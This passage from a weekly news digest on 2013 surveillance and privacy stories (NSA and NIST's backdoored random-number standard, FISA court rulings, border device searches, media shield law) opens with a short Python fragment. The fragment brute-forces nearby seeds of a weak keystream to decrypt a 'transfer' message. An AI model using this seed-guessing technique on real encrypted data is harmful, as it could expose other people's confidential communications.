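for guess in range(seed - 5, seed + 6):
    plain = bytes(c ^ k for c, k in zip(cipher, keystream(guess, len(cipher))))
    if plain.startswith(b"transfer"):
        print("recovered with seed", guess, ":", plain.decode())
        break
[/code]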

The Times reported that the Snowden documents suggest the NSA was involved in creating the number generator. Researchers say the evidence of NSA influence raises questions about whether any of the standards developed by the NIST can be trusted. "NIST's decisions used to be opaque and frustrating," said Matthew Green, a professor at Johns Hopkins University. "Now they're opaque and potentially malicious. Which is too bad because NIST performs such a useful service."

Cryptographers have long suspected the standard in question was faulty. Seven years ago, a pair of researchers in the Netherlands authored a paper that said the random number generator was insecure and that attacks against it could "be run on an ordinary PC." A year after that, in 2007, two Microsoft engineers flagged the standard as potentially containing a backdoor.

Following the criticism, the standard was revised in 2007 to include an optional workaround. The NSA has long been involved in encryption matters at the standards institute. "NIST follows NSA's lead in developing certain cryptographic standards," a 1993 Government Accountability Office report noted. A 2002 law mandates that the NIST set information security standards and lists the NSA merely as one of several other agencies that must be consulted.

Asked how often standards are reopened, NIST spokesperson Gail Porter said, "It's not frequent, but it does happen." She added that it would be "difficult to give you an exact number of times." Asked whether Microsoft would continue to use the encryption standard in some of its software, a spokesperson said the company "is evaluating NIST's recent recommendations and as always, will take the appropriate action to protect our customers." The NSA declined to comment.
http://arstechnica.com/security/2013...tion-standard/





Obama Administration Had Restrictions on NSA Reversed in 2011
Ellen Nakashima

The Obama administration secretly won permission from a surveillance court in 2011 to reverse restrictions on the National Security Agency’s use of intercepted phone calls and e-mails, permitting the agency to search deliberately for Americans’ communications in its massive databases, according to interviews with government officials and recently declassified material.

In addition, the court extended the length of time that the NSA is allowed to retain intercepted U.S. communications from five years to six years — and more under special circumstances, according to the documents, which include a recently released 2011 opinion by U.S. District Judge John D. Bates, then chief judge of the Foreign Intelligence Surveillance Court.

What had not been previously acknowledged is that the court in 2008 imposed an explicit ban — at the government’s request — on those kinds of searches, that officials in 2011 got the court to lift the bar and that the search authority has been used.

Together the permission to search and to keep data longer expanded the NSA’s authority in significant ways without public debate or any specific authority from Congress. The administration’s assurances rely on legalistic definitions of the term “target” that can be at odds with ordinary English usage. The enlarged authority is part of a fundamental shift in the government’s approach to surveillance: collecting first, and protecting Americans’ privacy later.

“The government says, ‘We’re not targeting U.S. persons,’ ” said Gregory T. Nojeim, senior counsel at the Center for Democracy and Technology. “But then they never say, ‘We turn around and deliberately search for Americans’ records in what we took from the wire.’ That, to me, is not so different from targeting Americans at the outset.”

The court decision allowed the NSA “to query the vast majority” of its e-mail and phone call databases using the e-mail addresses and phone numbers of Americans and legal residents without a warrant, according to Bates’s opinion.

The queries must be “reasonably likely to yield foreign intelligence information.” And the results are subject to the NSA’s privacy rules.

The court in 2008 imposed a wholesale ban on such searches at the government’s request, said Alex Joel, civil liberties protection officer at the Office of the Director of National Intelligence (ODNI). The government included this restriction “to remain consistent with NSA policies and procedures that NSA applied to other authorized collection activities,” he said.

But in 2011, to more rapidly and effectively identify relevant foreign intelligence communications, “we did ask the court” to lift the ban, ODNI general counsel Robert S. Litt said in an interview. “We wanted to be able to do it,” he said, referring to the searching of Americans’ communications without a warrant.

Joel gave hypothetical examples of why the authority was needed, such as when the NSA learns of a rapidly developing terrorist plot and suspects that a U.S. person may be a conspirator. Searching for communications to, from or about that person can help assess that person’s involvement and whether he is in touch with terrorists who are surveillance targets, he said. Officials would not say how many searches have been conducted.

The court’s expansion of authority went largely unnoticed when the opinion was released, but it formed the basis for cryptic warnings last year by a pair of Democratic senators, Ron Wyden (Ore.) and Mark Udall (Colo.), that the administration had a “back-door search loophole” that enabled the NSA to scour intercepted communications for those of Americans. They introduced legislation to require a warrant, but they were barred by classification rules from disclosing the court’s authorization or whether the NSA was already conducting such searches.

“The [surveillance] Court documents declassified recently show that in late 2011 the court authorized the NSA to conduct warrantless searches of individual Americans’ communications using an authority intended to target only foreigners,” Wyden said in a statement to The Washington Post. “Our intelligence agencies need the authority to target the communications of foreigners, but for government agencies to deliberately read the e-mails or listen to the phone calls of individual Americans, the Constitution requires a warrant.”

Senior administration officials disagree. “If we’re validly targeting foreigners and we happen to collect communications of Americans, we don’t have to close our eyes to that,” Litt said. “I’m not aware of other situations where once we have lawfully collected information, we have to go back and get a warrant to look at the information we’ve already collected.”

The searches take place under a surveillance program Congress authorized in 2008 under Section 702 of the Foreign Intelligence Surveillance Act. Under that law, the target must be a foreigner “reasonably believed” to be outside the United States, and the court must approve the targeting procedures in an order good for one year.

But — and this was the nub of the criticism — a warrant for each target would no longer be required. That means that communications with Americans could be picked up without a court first determining that there is probable cause that the people they were talking to were terrorists, spies or “foreign powers.”

That is why it is important to require a warrant before searching for Americans’ data, Udall said. “Our founders laid out a roadmap where Americans’ privacy rights are protected before their communications are seized or searched — not after the fact,” he said in a statement to The Post.

Another change approved by Bates allows the agency to keep the e-mails of or concerning Americans for up to six years, with an extension possible for foreign intelligence or counterintelligence purposes. Because the retention period begins “from the expiration date” of the one-year surveillance period, the court effectively added up to one year of shelf life for the e-mails collected at the beginning of the period.

Joel said that the change was intended to standardize retention periods across the agencies and that the more generous standard was “already in use” by another agency.

The NSA intercepts more than 250 million Internet communications each year under Section 702. Ninety-one percent are from U.S. Internet companies such as Google and Yahoo. The rest come from “upstream” companies that route Internet traffic to, from and within the United States. The expanded search authority applies only to the downstream collection.

Barton Gellman contributed to this report.
http://www.washingtonpost.com/world/...fd5_story.html





India Govt Reportedly Monitors Web Activities, Without ISP Knowledge

Summary: Indian government said to have deployed Lawful Intercept and Monitoring systems to track Internet activities of citizens, separate from similar systems used by telcos in the government's Central Monitoring System project.
Ellyne Phneah

The Lawful Intercept and Monitoring system, reportedly installed by the government, is separate from similar systems currently used by local telcos.

The Indian government is reportedly carrying out Internet surveillance on its citizens, in contrast with the government's rules and notifications for ensuring communications privacy.

According to an investigation by Chennai-based publication The Hindu, Lawful Intercept and Monitoring (LIM) systems have been deployed by the country's Centre for Development of Telematics (C-DOT) to monitor Internet traffic, e-mails, Web browsing, Skype and other Internet activities of Indian citizens.

The systems are fully owned and operated by the Indian government, unlike similar systems deployed by local Internet Service Providers (ISPs), which have to comply with the Indian Telegraph Act and Rule 419(A) of the country's IT rules, the publication reported on Monday.

The paper also said in 2006, the government released "instructions for ensuring privacy of communications", which stated ISPs have to employ "nodal officers" to regularly liaise with the authorities on interception requests. However, in reality, few ISPs have such staff and LIMs are operated without any consultation with them in any case.

The LIMs are said to be installed between the edge router and the core network, and to have 100 percent indiscriminate access to the online activity of the country's 160 million users. The systems also have an "always live" link, so they can be operated without legal oversight or ISP knowledge.

Authorities are hence able to monitor not just by e-mail address, URL or IP address, but through broad keyword or text searches. Nine security agencies, including the Intelligence Bureau (IB) and the Research and Analysis Wing (RAW), are reportedly involved.

This comes amid the launch of the Indian government's Central Monitoring System (CMS) project, which intercepts phone and internet data and commenced limited operations in April this year. The CMS was conceived last December after India's Income Tax Department taped the phone conversations of Niira Radia, a political lobbyist, with several senior journalists, politicians, and corporate houses over 300 days between 2008 and 2009.
http://www.zdnet.com/in/india-govt-r...ge-7000020396/





New Details in How the Feds Take Laptops at Border
AP

Newly disclosed U.S. government files provide an inside look at the Homeland Security Department's practice of seizing and searching electronic devices at the border without showing reasonable suspicion of a crime or getting a judge's approval.

The documents published Monday describe the case of David House, a young computer programmer in Boston who had befriended Army Pvt. Chelsea Manning, the soldier convicted of giving classified documents to WikiLeaks. U.S. agents quietly waited for months for House to leave the country then seized his laptop, thumb drive, digital camera and cellphone when he re-entered the United States. They held his laptop for weeks before returning it, acknowledging one year later that House had committed no crime and promising to destroy copies the government made of House's personal data.

The government turned over the federal records to House as part of a legal settlement agreement after a two-year court battle with the American Civil Liberties Union, which had sued the government on House's behalf. The ACLU said the records suggest that federal investigators are using border crossings to investigate U.S. citizens in ways that would otherwise violate the Fourth Amendment.

The Homeland Security Department declined to discuss the case.

House said he was 22 when he first met Manning, who now is serving a 35-year sentence for one of the biggest intelligence leaks in U.S. history. It was a brief, uneventful encounter at a January 2010 computer science event. But when Manning was arrested later that June, that nearly forgotten handshake came to mind. House, another tech enthusiast, considered Manning a bright, young, tech-savvy person who was trying to stand up to the U.S. government and expose what he believed were wrongheaded politics.

House volunteered with friends to set up an advocacy group they called the Bradley Manning Support Network, and he went to prison to visit Manning, formerly known as Bradley Manning.

It was that summer that House quietly landed on a government watchlist used by immigrations and customs agents at the border. His file noted that the government was on the lookout for a second batch of classified documents Manning had reportedly shared with the group WikiLeaks but hadn't made public yet. Border agents were told that House was "wanted for questioning" regarding the "leak of classified material." They were given explicit instructions: If House attempted to cross the U.S. border, "secure digital media," and "ID all companions."

But if House had been wanted for questioning, why hadn't federal agents gone back to his home in Boston? House said the Army, State Department and FBI had already interviewed him.

Instead, investigators monitored passenger flight records and waited for House to leave the country that November for a Mexico vacation with his girlfriend. When he returned, two agents were waiting for him, including one who specialized in computer forensics. They seized House's laptop and detained his computer for seven weeks, giving the government enough time to try to copy every file and keystroke House had made since declaring himself a Manning supporter.

President Barack Obama and his predecessors have maintained that people crossing into U.S. territory aren't protected by the Fourth Amendment. That policy is intended to allow for intrusive searches that keep drugs, child pornography and other illegal imports out of the country. But it also means the government can target travelers for no reason other than political advocacy if it wants, and obtain electronic documents identifying fellow supporters.

House and the ACLU are hoping his case will draw attention to the issue, and show how searching a suitcase is different than searching a computer.

"It was pretty clear to me I was being targeted for my visits to Manning (in prison) and my support for him," said House, in an interview last week.

How Americans end up getting their laptops searched at the border still isn't entirely clear.

The Homeland Security Department said it should be able to act on a hunch if someone seems suspicious. But agents also rely on a massive government-wide system called TECS, named after its predecessor the Treasury Enforcement Communications System.

Federal agencies, including the FBI and IRS, as well as Interpol, can feed TECS with information and flag travelers' files.

In one case that reached a federal appeals court, Howard Cotterman wound up in the TECS system because of a 1992 child sex conviction. That "hit" encouraged border patrol agents to detain his computer, which was found to contain child pornography. Cotterman's case ended up before the 9th Circuit Court of Appeals, which ruled this spring that the government should have reasonable suspicion before conducting a comprehensive search of an electronic device; but that ruling only applies to states that fall under that court's jurisdiction, and it left questions about what constitutes a comprehensive search.

In the case of House, he showed up in TECS in July 2010, about the same time he was helping to establish the Bradley Manning Support Network. His TECS file, released as part of his settlement agreement, was the document that told border agents House was wanted for questioning about the leak of classified material.

It wasn't until late October, though, that investigators noticed House's passport number in an airline reservation system for travel to Los Cabos. When he returned to Chicago O'Hare airport, the agents waiting for him took House's laptop, thumb drive, digital camera and cellphone. He was questioned about his affiliation with Manning and his visits to Manning in prison. The agents eventually let him go and returned his cell phone. But the other items were detained and taken to an ICE field office in Manhattan.

Seven weeks after the incident, House faxed a letter to immigration authorities asking that the devices be returned. They were sent to him the next day, via Federal Express.

By then agents had already created an "image" of his laptop, according to the documents. Because House had refused to give the agents his password and apparently had configured his computer in a way that appeared to stump computer forensics experts, it wasn't until June 2011 that investigators were satisfied that House's computer didn't contain anything illegal. By then, they had already sent a second image of his hard drive to Army criminal investigators familiar with the Manning case. In August 2011, the Army agreed that House's laptop was clean and promised to destroy any files from House's computer.

Catherine Crump, an ACLU lawyer who represented House, said she doesn't understand why Congress or the White House are leaving the debate up to the courts.

"Ultimately, the Supreme Court will need to address this question because unfortunately neither of the other two branches of government appear motivated to do so," said Crump.

House, an Alabama native, said he didn't ask for any money as part of his settlement agreement and said his primary concern was ensuring that a document containing the names of Manning Support Network donors didn't wind up in a permanent government file. The court order required the destruction of all his files, which House said satisfied him.

He is writing a book about his experiences and his hope to create a youth-based political organization. House said he severed ties with the Support Network last year after becoming disillusioned with Manning and WikiLeaks, which he said appeared more focused on destroying America and ruining lives than challenging policy.

"That era was a strange time," House said. "I'm hoping we can get our country to go in a better direction."
http://www.nytimes.com/aponline/2013...-searches.html





Court Upbraided N.S.A. on Its Use of Call-Log Data
Scott Shane

Intelligence officials released secret documents on Tuesday showing that a judge reprimanded the National Security Agency in 2009 for violating its own procedures and misleading the nation’s intelligence court about how it used the telephone call logs it gathers in the hunt for terrorists.

It was the second case of a severe scolding of the spy agency by the Foreign Intelligence Surveillance Court to come to light since the disclosure of thousands of N.S.A. documents by Edward J. Snowden, a former contractor, began this summer.

The newly disclosed violations involved the N.S.A. program that has drawn perhaps the sharpest criticism from members of Congress and civil libertarians: the collection and storage for five years of information on virtually every phone call made in the United States. The agency uses orders from the intelligence court to compel phone companies to turn over records of numbers called and the time and duration of each call — the “metadata,” not the actual content of the calls.

Since Mr. Snowden disclosed the program, the agency has said that while it gathers data on billions of calls, it makes only a few hundred queries in the database each year, when it has “reasonable, articulable suspicion” that a telephone number is connected to terrorism.

But the new documents show that the agency also compares each day’s phone call data as it arrives with an “alert list” of thousands of domestic and foreign phone numbers that it has identified as possibly linked to terrorism.

The agency told the court that all the numbers on the alert list had met the legal standard of suspicion, but that was false. In fact, only about 10 percent of 17,800 phone numbers on the alert list in 2009 had met that test, a senior intelligence official said.

In a sharply worded March 2009 ruling, Judge Reggie B. Walton described the N.S.A.’s failure to comply with rules set by the intelligence court, set limits on how it could use the data it had gathered, and accused the agency of repeatedly misinforming the judges.

“The government has compounded its noncompliance with the court’s orders by repeatedly submitting inaccurate descriptions of the alert list process” to the court, Judge Walton wrote. “It has finally come to light that the F.I.S.C.’s authorizations of this vast collection program have been premised on a flawed depiction of how the N.S.A. uses” the phone call data.

The senior American intelligence official, briefing reporters before the documents’ release, admitted the sting of the court’s reprimand but said the problems came in a complex, highly technical program and were unintentional.

“There was nobody at N.S.A. who really had a full understanding of how the program was operating at the time,” said the official, who spoke on the condition of anonymity. The official noted that the agency itself discovered the problem, reported it to the court and to Congress, and worked out new procedures that the court approved.

In making public 14 documents on the Web site of the director of national intelligence, James R. Clapper Jr., the intelligence officials were acting in response to Freedom of Information Act lawsuits and a call from President Obama for greater transparency about intelligence programs. The lawsuits were filed by two advocacy groups, the Electronic Frontier Foundation and the American Civil Liberties Union.

“The documents only begin to uncover the abuses of the huge databases of information the N.S.A. has of innocent Americans’ calling records,” said Mark M. Jaycox, a policy analyst at the Electronic Frontier Foundation. He said the agency’s explanation — that none of its workers fully understood the phone metadata program — showed “how much of a rogue agency the N.S.A. has become.”

Judge Walton’s ruling, originally classified as top secret, did not go that far. But he wrote that the privacy safeguards approved by the court “have been so frequently and systematically violated” that they “never functioned effectively.”

Senator Patrick J. Leahy of Vermont, the chairman of the Senate Judiciary Committee, welcomed the release of the documents, but said that they showed “systemic problems” and that the bulk collection of Americans’ phone records should be stopped.

Intelligence officials have expressed some willingness to adjust the program in response to complaints from Congress and the public, possibly by requiring the phone companies, rather than the N.S.A., to stockpile the call data. But they say that the program remains crucial in detecting terrorist plots and is now being run in line with the court’s rules.

A different intelligence court judge, John D. Bates, rebuked the N.S.A. in 2011 for violations in another program and also complained of a pattern of misrepresentation. The 2011 opinion, which made a reference to the 2009 reprimand, was released by intelligence officials last month.

Since June, Mr. Snowden’s revelations have set off the most extensive public scrutiny of the N.S.A. since its creation in 1952. Last week, based on his documents, The New York Times, ProPublica and The Guardian wrote about the agency’s systematic efforts to defeat privacy protections for Internet communications, including evidence that the agency deliberately weakened an encryption standard adopted nationally and internationally in 2006.

On Tuesday, the National Institute of Standards and Technology, the agency charged with setting federal cybersecurity standards, scrambled to try to restore public confidence, after reports that it had recommended a standard that contained a back door for the N.S.A.

The agency said it would reopen the public vetting process for the standard, used by software developers around the world. “If vulnerabilities are found in these or any other N.I.S.T. standard, we will work with the cryptographic community to address them as quickly as possible,” the agency said in a statement.

The Times reported that as part of the N.S.A.’s efforts, it had worked behind the scenes to push the same standard on the International Organization for Standardization, which counts 163 countries among its members.

The national standards agency denied that it had ever deliberately weakened a cryptographic standard, and it moved to clarify its relationship with the N.S.A. “The National Security Agency participates in the N.I.S.T. cryptography process because of its recognized expertise,” the standards agency said. “N.I.S.T. is also required by statute to consult with the N.S.A.”

Cryptographers said that the revelations last week had eroded their trust in the agency, but that reopening the review process was an important step in rebuilding confidence.

“I know from firsthand communications that a number of people at N.I.S.T. feel betrayed by their colleagues at the N.S.A.,” Matthew D. Green, a cryptography researcher at Johns Hopkins University, said in an interview on Tuesday. “Reopening the standard is the first step in fixing that betrayal and restoring confidence in N.I.S.T.”

Nicole Perlroth contributed reporting.
http://www.nytimes.com/2013/09/11/us...-log-data.html





N.S.A. Spied on Brazilian Oil Company, Report Says
Simon Romero

The National Security Agency spied on Petrobras, Brazil’s giant national oil company, according to a report here on Sunday night by the Globo television network, in the latest revelation of the agency’s surveillance methods that have raised tension between Brazil and the United States.

Still, details were sparse in the report as to precisely what information the N.S.A. may have obtained from spying on Petrobras, raising questions about what objectives the agency could have in targeting the company, which is controlled by Brazil’s government and ranks among the world’s largest oil producers.

The report, based on documents obtained from Edward J. Snowden, the former N.S.A. contractor, said Petrobras figured among other prominent N.S.A. targets, including Google; the Society for Worldwide Interbank Financial Telecommunication, or Swift, a consortium based in Belgium that aims to allow banks around the world to securely exchange financial information; and France’s Ministry of Foreign Affairs.

It was the latest in a series of reports here in which Glenn Greenwald, an American journalist living in Rio de Janeiro who is working with Globo, has shed light on N.S.A. activities in Latin America from documents given to him by Mr. Snowden.

In a report last week, Globo revealed that the N.S.A. had spied on the presidents of Brazil and Mexico and their top aides, producing an angry reaction from Brazil’s president, Dilma Rousseff, who held out the possibility of canceling a state visit to Washington in October that was arranged to recognize Brazil’s importance to the United States.

In a statement issued after the Globo report was aired, James R. Clapper, the Obama administration’s director of national intelligence, said that it was no secret that the United States government collected intelligence about financial matters. Mr. Clapper said that doing so was needed to gather insight into the economic policies of other countries.

“What we do not do, as we have said many times, is use our foreign intelligence capabilities to steal the trade secrets of foreign companies on behalf of — or give intelligence we collect to — U.S. companies to enhance their international competitiveness or increase their bottom line,” Mr. Clapper said in the statement.

Petrobras did not immediately reply to a request for comment on the televised report on Sunday night.

Globo acknowledged in its report that it was unclear what information the N.S.A. was seeking by spying on Petrobras, but the television network emphasized that the company controlled vast quantities of data on Brazil’s offshore oil fields. Brazil is planning to auction exploration licenses in October that would allow foreign oil companies to form ventures with Petrobras to explore for oil in deep-sea areas.

Petrobras has symbolized Brazil’s ambition of emerging as a global energy powerhouse after discoveries over the last decade of large offshore oil reserves, but the sprawling company has recently struggled with delays of major oil projects, soaring debt and declining production at some of its older offshore oil fields.

In contrast to some other major oil-producing countries like Mexico and Saudi Arabia, where state-controlled oil companies hold monopolies, Brazil already allows international oil companies to have extensive operations. While Petrobras still wields by far the most influence in Brazil’s oil industry, American, Chinese and European energy companies have been seeking to expand here.
http://www.nytimes.com/2013/09/09/wo...port-says.html





Beijing’s Ban on Internet Rumors Threatens Free Speech. And Some in China Aren’t Afraid to Say it.
Brian Fung

The Chinese Internet isn’t exactly known as a hotbed for free speech. But judging by a few recent events, debate about how the Internet in China should be managed is gaining steam.

Beijing has been embroiled in a campaign against online rumor-mongering of late. In a recent judicial ruling, the government announced stiff penalties for posting rumors that get shared 500 times or seen 5,000 times. Civil-liberties advocates say the ruling, with its possible three-year jail sentence, sets a dangerous precedent for free speech.

The new law is so extreme that even some domestic intellectuals have begun criticizing it.

Among the critics is Zhu Mingguo, a key party official in the province of Guangdong. His criticism of the anti-rumor rule might sound familiar to some in the West frustrated with how legacy organizations have adapted (or not) to new technology.

“In an environment of new media, we should take the initiative … and seek breakthroughs in propaganda on the Internet … and should not simply resort to the means of ‘delete’, ‘shut down’ and ‘reject’,” Zhu said, according to local media reports last week.

Zhu isn’t the only official to voice his concerns over the crackdown. According to the South China Morning Post, Guangzhou law enforcement called the new policy a potential “nightmare” on its microblog — a post that was then shared by another provincial body’s official account.

Between Zhu’s comments and the public outcry online, a feisty discussion over Internet governance appears to be afoot in a country known for sending undercover agents into chatrooms and forums to spread propaganda.

China’s digitally engaged population could make a bigger difference than you think. Its ranks aren’t full of clicktivists. Instead, there’s a robust cybersleuthing community whose forensic abilities far surpass Reddit’s even on its best days. These private investigators root out corruption by performing “human flesh searches” that turn up photos of government largesse and wrongdoing. The creepy term notwithstanding, the online gumshoes became part of a high-profile case last year involving a bureaucrat who bought luxury watches and grinned at the sight of human misfortune.

Photos can be doctored, of course, and it’s not clear whether human flesh searches would be at risk under the new anti-rumor policy. But the resistance to the judicial ruling is evidence that the Chinese Internet is far more diverse than we sometimes give it credit for.
http://www.washingtonpost.com/blogs/...y-it/?hpid=z12





Congress shall make no law…

Senate Panel OKs Measure Defining a Journalist
Donna Cassata

A Senate panel on Thursday approved a measure defining a journalist, which had been an obstacle to broader media shield legislation designed to protect reporters and the news media from having to reveal their sources.

The Judiciary Committee's action cleared the way for approval of legislation prompted by the disclosure earlier this year that the Justice Department had secretly subpoenaed almost two months of telephone records for 21 phone lines used by reporters and editors for The Associated Press and secretly used a warrant to obtain some emails of a Fox News journalist. The subpoenas grew out of investigations into leaks of classified information to the news organizations.

The AP received no advance warning of the subpoena.

The vote was 13-5 for a compromise defining a "covered journalist" as an employee, independent contractor or agent of an entity that disseminates news or information. The individual would have been employed for one year within the last 20 or three months within the last five years.

It would apply to student journalists or someone with a considerable amount of freelance work in the last five years. A federal judge also would have the discretion to declare an individual a "covered journalist," who would be granted the privileges of the law.

The committee later approved the overall bill on a 13-5 vote.

Sen. Chuck Schumer, D-N.Y., a chief proponent of the media shield legislation, worked with Sens. Dianne Feinstein, D-Calif., and Dick Durbin, D-Ill., as well as representatives from news organizations, on the compromise.

The bill would protect reporters and news media organizations from being required to reveal the identities of confidential sources, but it does not grant an absolute privilege for journalists.

Sen. Jeff Sessions, R-Ala., complained that the definition of a journalist was too broad. Pushing back, Feinstein said the intent was to set up a test to determine a bona fide journalist.

"I think journalism has a certain tradecraft. It's a profession. I recognize that everyone can think they're a journalist," Feinstein said.

The overall measure would incorporate many of the changes proposed by Attorney General Eric Holder in July. Criticism of the collection of the material without any notice to the news organizations prompted President Barack Obama to order Holder to review the department's policy.

Holder's revised guidelines called for the government to give advance notice to the news media about subpoena requests for reporters' phone records unless the attorney general determines such notice would pose a clear and substantial threat to the investigation. Search warrants for a reporter's email would only apply when the individual is the focus of a criminal investigation for conduct not connected to ordinary newsgathering.

The bill makes clear that before the government asks a news organization to divulge sources, it first must go to a judge, who would supervise any subpoenas or court orders for information. Such orders would be limited, if possible, "in purpose, subject matter and period of time covered so as to avoid compelling disclosure of peripheral, nonessential or speculative information."

Holder's revised guidelines do not call for a judge to be involved before the government asks a news organization to divulge sources. However, the guidelines call for a new standing News Media Review Committee to advise the attorney general on such requests.

Reporters must be notified within 45 days of a request, a period that could be extended another 45 days but no more.

In the AP story that triggered one of the leak probes, the news organization reported that U.S. intelligence had learned that al-Qaida's Yemen branch hoped to launch a spectacular attack using a new, nearly undetectable bomb aboard a U.S.-bound airliner around the anniversary of Osama bin Laden's death.

In the Fox News story, reporter James Rosen reported that U.S. intelligence officials had warned Obama and senior U.S. officials that North Korea would respond to a U.N. Security Council resolution condemning nuclear tests with another nuclear test.
http://www.breitbart.com/Big-Journal...g-a-journalist





Mirror Investigated Over Criminal Liability for Alleged Phone Hacking

Publisher of Daily and Sunday Mirror says Met is investigating if it is 'criminally liable' for alleged hacking by previous employees
Josh Halliday and Lisa O'Carroll

The publisher of the Sunday Mirror has said it is under investigation by the Metropolitan police in relation to alleged phone hacking.

Trinity Mirror, which also publishes the Daily Mirror, said in a statement to the stock exchange on Thursday morning that the Metropolitan police was investigating whether it was "criminally liable" for an alleged phone-hacking conspiracy by previous employees.

The announcement is the clearest admission by the newspaper group that it is under investigation as part of Operation Weeting, Scotland Yard's two-year inquiry into the phone-hacking scandal.

Trinity Mirror said: "Trinity Mirror plc notes that its subsidiary, MGN Limited, publisher of the group's national newspapers, has been notified by the Metropolitan police that they are at a very early stage in investigating whether MGN is criminally liable for the alleged unlawful conduct by previous employees in relation to phone hacking on the Sunday Mirror.

"The group does not accept wrongdoing within its business and takes these allegations seriously. It is too soon to know how these matters will progress and further updates will be made if there are any significant developments."

The notification by the Met is a serious development for MGN and indicates that the police are investigating the company for a corporate charge as opposed to individual charges against journalists who have been arrested in relation to allegations of phone hacking.

MGN has made the notification public because it is obliged to inform shareholders of any development that could have a material impact on its stock. By mid-morning Trinity Mirror's shares had dropped 5% to 123.25p.

News International, now rebranded News UK, did not reveal it had been told by the police that it was being investigated for corporate charges in May 2012, possibly because the company was not separately listed on the London stock market. However it emerged in the Leveson inquiry in July 2012 when the head of the investigation into alleged phone hacking and unlawful payments for stories, Sue Akers, gave evidence.

It was reported last month that one of Rupert Murdoch's most senior lawyers had been interviewed under caution on behalf of the company and two other very senior figures have been officially cautioned for corporate offences.

It has also been widely reported that American authorities are investigating Murdoch's companies in the US for possible corporate charges for alleged violation of the Foreign Corrupt Practices Act.

This month Dan Evans, a former Sunday Mirror reporter, became the first journalist to be charged over an alleged conspiracy to hack phones who was not working at the News of the World. Evans, who worked at the Sunday Mirror between 2002 and 2004 and the News of the World from 2005, is accused of four counts of alleged criminal activity, including a conspiracy to hack the phones of "well-known people and their associates" between 2003 and 2010.

Scotland Yard first announced in March that it was investigating what it alleged was a separate conspiracy to the phone-hacking scandal at the News of the World.

On 14 March the force arrested four former Sunday Mirror journalists – including its former editor, Tina Weaver – on suspicion of being involved in an alleged phone-hacking conspiracy between 2003 and 2004.

The other three ex-Sunday Mirror journalists arrested were the Sunday People editor, James Scott, his deputy, Nick Buckley and Mark Thomas, the former People editor.
http://www.theguardian.com/media/201...-phone-hacking

















Until next week,

- js.



















Current Week In Review





Recent WiRs -

September 7th, August 31st, August 24th, August 17th

Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.


"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black